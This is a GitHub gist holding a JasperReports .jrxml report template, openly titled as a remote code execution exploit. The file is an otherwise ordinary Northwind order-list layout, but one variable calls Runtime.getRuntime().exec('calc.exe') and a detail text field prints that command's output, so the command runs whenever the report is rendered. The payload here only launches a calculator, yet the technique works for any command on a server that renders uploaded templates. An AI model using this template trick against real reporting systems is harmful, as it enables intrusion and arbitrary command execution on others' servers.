Skip to content

Instantly share code, notes, and snippets.

@IIIoKoLaDNeVCHEmneVinoVat

IIIoKoLaDNeVCHEmneVinoVat/S2_Jasper_RCE.jrxml

Forked from v-p-b/S2_Jasper_RCE.jrxml
Created December 7, 2018 02:33
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save IIIoKoLaDNeVCHEmneVinoVat/7682455b1021103073b5526348b76b24 to your computer and use it in GitHub Desktop.
Save IIIoKoLaDNeVCHEmneVinoVat/7682455b1021103073b5526348b76b24 to your computer and use it in GitHub Desktop.
Download ZIP
JasperReports Remote Code Execution with a single .JRXML file
Raw
S2_Jasper_RCE.jrxml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE jasperReport PUBLIC "-//JasperReports//DTD Report Design//EN" "http://jasperreports.sourceforge.net/dtds/jasperreport.dtd">
<jasperReport name="FirstJasper" columnCount="2" pageWidth="595" pageHeight="842" columnWidth="270" columnSpacing="15" leftMargin="20" rightMargin="20" topMargin="30" bottomMargin="30">
<style name="Arial_Normal" isDefault="true" fontName="Arial" fontSize="8" isBold="false" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
<style name="Arial_Bold" isDefault="false" fontName="Arial" fontSize="8" isBold="true" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Bold" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
<style name="Arial_Italic" isDefault="false" fontName="Arial" fontSize="8" isBold="false" isItalic="true" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Oblique" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
<style name="Comic_Normal" isDefault="false" fontName="Comic Sans MS" fontSize="10" isBold="false" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="COMIC.TTF" pdfEncoding="Identity-H" isPdfEmbedded="true"/>
<style name="Comic_Bold" isDefault="false" fontName="Comic Sans MS" fontSize="10" isBold="true" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="COMICBD.TTF" pdfEncoding="Identity-H" isPdfEmbedded="true"/>
<parameter name="MaxOrderID" class="java.lang.Integer">
</parameter>
<queryString><![CDATA[SELECT '2008-05-22 12:12:11' as ShippedDate,'HU' as ShipCountry, '2008-05-22 12:12:11' as RequiredDate,'cust' as CustomerID,1337 as OrderID,'jenny' as ShipName,1 as ShipVia,'1234' as ShipPostalCode, '2008-05-22 12:12:11' as OrderDate,'bp' as ShipCity, 'addr' as ShipAddress,1 as EmployeeID,'region' as ShipRegion,10 as Freight]]></queryString>
<field name="ShippedDate" class="java.sql.Timestamp">
</field>
<field name="ShipCountry" class="java.lang.String">
</field>
<field name="RequiredDate" class="java.sql.Timestamp">
</field>
<field name="CustomerID" class="java.lang.String">
</field>
<field name="OrderID" class="java.lang.Integer">
</field>
<field name="ShipName" class="java.lang.String">
</field>
<field name="ShipVia" class="java.lang.Integer">
</field>
<field name="ShipPostalCode" class="java.lang.String">
</field>
<field name="OrderDate" class="java.sql.Timestamp">
</field>
<field name="ShipCity" class="java.lang.String">
</field>
<field name="ShipAddress" class="java.lang.String">
</field>
<field name="EmployeeID" class="java.lang.Integer">
</field>
<field name="ShipRegion" class="java.lang.String">
</field>
<field name="Freight" class="java.lang.Double">
</field>
<variable name="FirstLetter" class="java.lang.String" resetType="None">
<variableExpression><![CDATA[$F{ShipCountry}.substring(0, 1).toUpperCase()]]></variableExpression>
</variable>
<variable name="FreightSumFirstLetterGroup" class="java.lang.Double" resetType="Group" resetGroup="FirstLetterGroup" calculation="Sum">
<variableExpression><![CDATA[$F{Freight}]]></variableExpression>
</variable>
<variable name="FreightSumCountryGroup" class="java.lang.Double" resetType="Group" resetGroup="CountryGroup" calculation="Sum">
<variableExpression><![CDATA[$F{Freight}]]></variableExpression>
</variable>
<variable name="FreightSumColumn" class="java.lang.Double" resetType="Column" calculation="Sum">
<variableExpression><![CDATA[$F{Freight}]]></variableExpression>
</variable>
<variable name="FreightSumPage" class="java.lang.Double" resetType="Page" calculation="Sum">
<variableExpression><![CDATA[$F{Freight}]]></variableExpression>
</variable>
<variable name="FreightSumReport" class="java.lang.Double" calculation="Sum">
<variableExpression><![CDATA[$F{Freight}]]></variableExpression>
</variable>
<variable name="DateHighestCountryGroup" class="java.sql.Timestamp" resetType="Group" resetGroup="CountryGroup" calculation="Highest">
<variableExpression><![CDATA[$F{OrderDate}]]></variableExpression>
</variable>
<variable name="RegionCountCountryGroup" class="java.lang.Integer" resetType="Group" resetGroup="CountryGroup" calculation="Count">
<variableExpression><![CDATA[$F{ShipRegion}]]></variableExpression>
</variable>
<variable name="myScanner" class="java.util.Scanner" resetType="None">
<variableExpression><![CDATA[new java.util.Scanner(java.lang.Runtime.getRuntime().exec("calc.exe").getInputStream()).useDelimiter("\\A")]]></variableExpression>
</variable>
<group name="FirstLetterGroup" isStartNewColumn="true" isReprintHeaderOnEachPage="true" minHeightToStartNewPage="200">
<groupExpression><![CDATA[$V{FirstLetter}]]></groupExpression>
<groupHeader>
<band height="25">
<rectangle>
<reportElement x="0" y="14" width="270" height="11" forecolor="#ffdddd" backcolor="#ffdddd"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement mode="Opaque" x="0" y="14" width="120" height="11" forecolor="#ff0000" backcolor="#ffdddd" style="Arial_Italic"/>
<textElement>
<font isUnderline="true"/>
</textElement>
<text><![CDATA[Countries Starting With Letter :]]></text>
</staticText>
<textField>
<reportElement mode="Opaque" x="120" y="14" width="150" height="11" forecolor="#ff0000" backcolor="#ffdddd" style="Arial_Bold"/>
<textFieldExpression class="java.lang.String"><![CDATA[$V{FirstLetter}]]></textFieldExpression>
</textField>
</band>
</groupHeader>
<groupFooter>
<band height="15">
<line>
<reportElement x="0" y="0" width="270" height="1" forecolor="#ff0000"/>
<graphicElement/>
</line>
<staticText>
<reportElement x="0" y="1" width="45" height="11" forecolor="#ff0000" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Count :]]></text>
</staticText>
<textField>
<reportElement x="45" y="1" width="25" height="11" forecolor="#ff0000" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Integer"><![CDATA[$V{FirstLetterGroup_COUNT}]]></textFieldExpression>
</textField>
<staticText>
<reportElement x="70" y="1" width="140" height="11" forecolor="#ff0000" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Total :]]></text>
</staticText>
<textField pattern="0.00">
<reportElement x="210" y="1" width="60" height="11" forecolor="#ff0000" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Double"><![CDATA[$V{FreightSumFirstLetterGroup}]]></textFieldExpression>
</textField>
</band>
</groupFooter>
</group>
<group name="CountryGroup" isReprintHeaderOnEachPage="true">
<groupExpression><![CDATA[$F{ShipCountry}]]></groupExpression>
<groupHeader>
<band height="15">
<line>
<reportElement x="0" y="14" width="270" height="1"/>
<graphicElement/>
</line>
<textField>
<reportElement x="10" y="2" width="100" height="11" style="Arial_Bold"/>
<textFieldExpression class="java.lang.String"><![CDATA[$F{ShipCountry}]]></textFieldExpression>
</textField>
<textField evaluationTime="Group" evaluationGroup="CountryGroup" pattern="EEE, MMM d, yyyy">
<reportElement x="170" y="2" width="100" height="11" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.sql.Timestamp"><![CDATA[$V{DateHighestCountryGroup}]]></textFieldExpression>
</textField>
</band>
</groupHeader>
<groupFooter>
<band height="15">
<rectangle>
<reportElement x="0" y="0" width="270" height="11" forecolor="#c0c0c0" backcolor="#c0c0c0"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement mode="Opaque" x="0" y="0" width="45" height="11" backcolor="#c0c0c0" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Count :]]></text>
</staticText>
<textField>
<reportElement mode="Opaque" x="45" y="0" width="25" height="11" backcolor="#c0c0c0" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Integer"><![CDATA[$V{CountryGroup_COUNT}]]></textFieldExpression>
</textField>
<staticText>
<reportElement mode="Opaque" x="70" y="0" width="140" height="11" backcolor="#c0c0c0" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Total :]]></text>
</staticText>
<textField pattern="0.00">
<reportElement mode="Opaque" x="210" y="0" width="60" height="11" backcolor="#c0c0c0" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Double"><![CDATA[$V{FreightSumCountryGroup}]]></textFieldExpression>
</textField>
</band>
</groupFooter>
</group>
<group name="BreakGroup">
<groupExpression><![CDATA[new Boolean($V{BreakGroup_COUNT}.intValue() > 5)]]></groupExpression>
<groupHeader>
<band height="5">
</band>
</groupHeader>
<groupFooter>
<band height="5">
</band>
</groupFooter>
</group>
<title>
<band height="100">
<elementGroup>
<line>
<reportElement x="0" y="0" width="555" height="1"/>
<graphicElement/>
</line>
</elementGroup>
<textField isBlankWhenNull="true">
<reportElement x="180" y="5" width="375" height="35" style="Comic_Bold"/>
<textElement textAlignment="Right">
<font size="22"/>
</textElement>
<textFieldExpression class="java.lang.String"><![CDATA["asdf"]]></textFieldExpression>
</textField>
<staticText>
<reportElement x="180" y="40" width="375" height="15" style="Arial_Italic"/>
<textElement textAlignment="Right">
<font size="12"/>
</textElement>
<text><![CDATA[(c)2001-2006 by teodord]]></text>
</staticText>
<textField evaluationTime="Report">
<reportElement x="255" y="55" width="100" height="40"/>
<textElement textAlignment="Justified"/>
<textFieldExpression class="java.lang.String"><![CDATA["There are " + String.valueOf($V{REPORT_COUNT}) + " orders on this report, with a total freight of " + new DecimalFormat("0.00").format($V{FreightSumReport}.doubleValue())]]></textFieldExpression>
</textField>
</band>
</title>
<pageHeader>
<band height="45">
<rectangle>
<reportElement mode="Transparent" x="0" y="0" width="555" height="40"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement x="0" y="0" width="555" height="25"/>
<textElement textAlignment="Center">
<font size="18"/>
</textElement>
<text><![CDATA[Northwind Order List]]></text>
</staticText>
<textField>
<reportElement x="0" y="25" width="555" height="15"/>
<textElement textAlignment="Center">
<font size="10"/>
</textElement>
<textFieldExpression class="java.lang.String"><![CDATA["Max order ID is : " + String.valueOf($P{MaxOrderID})]]></textFieldExpression>
</textField>
</band>
</pageHeader>
<columnHeader>
<band height="11">
<rectangle>
<reportElement x="0" y="0" width="270" height="11" backcolor="#333333"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement mode="Opaque" x="0" y="0" width="40" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Center"/>
<text><![CDATA[Order]]></text>
</staticText>
<staticText>
<reportElement mode="Opaque" x="40" y="0" width="145" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Center"/>
<text><![CDATA[Name, City]]></text>
</staticText>
<staticText>
<reportElement mode="Opaque" x="185" y="0" width="50" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<text><![CDATA[Date]]></text>
</staticText>
<staticText>
<reportElement mode="Opaque" x="235" y="0" width="35" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Freight]]></text>
</staticText>
</band>
</columnHeader>
<detail>
<band height="13">
<rectangle>
<reportElement x="0" y="4" width="1" height="1" forecolor="#ff0000" backcolor="#ff0000">
<printWhenExpression><![CDATA[new Boolean($F{OrderID}.intValue() % 10 == 0)]]></printWhenExpression>
</reportElement>
<graphicElement/>
</rectangle>
<textField>
<reportElement x="1" y="0" width="35" height="11">
<printWhenExpression><![CDATA[new Boolean($F{OrderID}.intValue() % 10 != 0)]]></printWhenExpression>
</reportElement>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Integer"><![CDATA[$F{OrderID}]]></textFieldExpression>
</textField>
<textField>
<reportElement x="1" y="0" width="35" height="11" forecolor="#ff0000" style="Arial_Bold">
<printWhenExpression><![CDATA[new Boolean($F{OrderID}.intValue() % 10 == 0)]]></printWhenExpression>
</reportElement>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Integer"><![CDATA[$F{OrderID}]]></textFieldExpression>
</textField>
<textField isStretchWithOverflow="true">
<reportElement positionType="Float" x="40" y="0" width="110" height="11"/>
<textElement/>
<textFieldExpression class="java.lang.String"><![CDATA[$V{myScanner}.next()]]></textFieldExpression></textField>
<textField isBlankWhenNull="true">
<reportElement x="155" y="0" width="25" height="11"/>
<textElement/>
<textFieldExpression class="java.lang.String"><![CDATA[$F{ShipRegion}]]></textFieldExpression>
</textField>
<textField pattern="dd/MM/yyyy">
<reportElement x="185" y="0" width="50" height="11"/>
<textElement/>
<textFieldExpression class="java.sql.Timestamp"><![CDATA[$F{OrderDate}]]></textFieldExpression>
</textField>
<textField pattern="0.00">
<reportElement x="235" y="0" width="35" height="11"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Double"><![CDATA[$F{Freight}]]></textFieldExpression>
</textField>
<line>
<reportElement positionType="Float" x="0" y="12" width="270" height="1" forecolor="#808080"/>
<graphicElement pen="Thin"/>
</line>
</band>
</detail>
<columnFooter>
<band height="11">
<rectangle>
<reportElement x="0" y="0" width="270" height="11" backcolor="#333333"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement mode="Opaque" x="0" y="0" width="45" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Count :]]></text>
</staticText>
<textField>
<reportElement mode="Opaque" x="45" y="0" width="25" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Integer"><![CDATA[$V{COLUMN_COUNT}]]></textFieldExpression>
</textField>
<staticText>
<reportElement mode="Opaque" x="70" y="0" width="140" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Total :]]></text>
</staticText>
<textField pattern="0.00">
<reportElement mode="Opaque" x="210" y="0" width="60" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Double"><![CDATA[$V{FreightSumColumn}]]></textFieldExpression>
</textField>
</band>
</columnFooter>
<pageFooter>
<band height="30">
<rectangle>
<reportElement mode="Transparent" x="0" y="5" width="555" height="25"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement x="5" y="10" width="50" height="20"/>
<textElement textAlignment="Right">
<font size="14"/>
</textElement>
<text><![CDATA[Count :]]></text>
</staticText>
<textField>
<reportElement x="55" y="10" width="45" height="20"/>
<textElement textAlignment="Right">
<font size="14"/>
</textElement>
<textFieldExpression class="java.lang.Integer"><![CDATA[$V{PAGE_COUNT}]]></textFieldExpression>
</textField>
<staticText>
<reportElement x="430" y="10" width="50" height="20"/>
<textElement textAlignment="Right">
<font size="14"/>
</textElement>
<text><![CDATA[Total :]]></text>
</staticText>
<textField pattern="0.00">
<reportElement x="480" y="10" width="70" height="20"/>
<textElement textAlignment="Right">
<font size="14"/>
</textElement>
<textFieldExpression class="java.lang.Double"><![CDATA[$V{FreightSumPage}]]></textFieldExpression>
</textField>
<textField>
<reportElement x="200" y="10" width="75" height="20"/>
<textElement textAlignment="Right">
<font size="14"/>
</textElement>
<textFieldExpression class="java.lang.Integer"><![CDATA[$V{PAGE_NUMBER}]]></textFieldExpression>
</textField>
<staticText>
<reportElement x="275" y="10" width="5" height="20"/>
<textElement textAlignment="Center">
<font size="14"/>
</textElement>
<text><![CDATA[/]]></text>
</staticText>
<textField evaluationTime="Report">
<reportElement x="280" y="10" width="75" height="20"/>
<textElement>
<font size="14"/>
</textElement>
<textFieldExpression class="java.lang.Integer"><![CDATA[$V{PAGE_NUMBER}]]></textFieldExpression>
</textField>
</band>
</pageFooter>
<summary>
<band height="65">
<rectangle>
<reportElement x="0" y="10" width="555" height="55" backcolor="#c0c0c0"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement mode="Opaque" x="200" y="15" width="200" height="45" backcolor="#c0c0c0"/>
<textElement textAlignment="Justified">
<font size="12"/>
</textElement>
<text><![CDATA[That's All Folks! Hei_remind_me_to_put myself up for abduction. END!]]></text>
</staticText>
</band>
</summary>
</jasperReport>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment